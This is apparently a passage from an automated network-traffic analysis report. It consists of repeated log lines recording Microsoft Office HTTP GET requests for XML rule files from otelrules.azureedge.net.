Source: global traffic	HTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
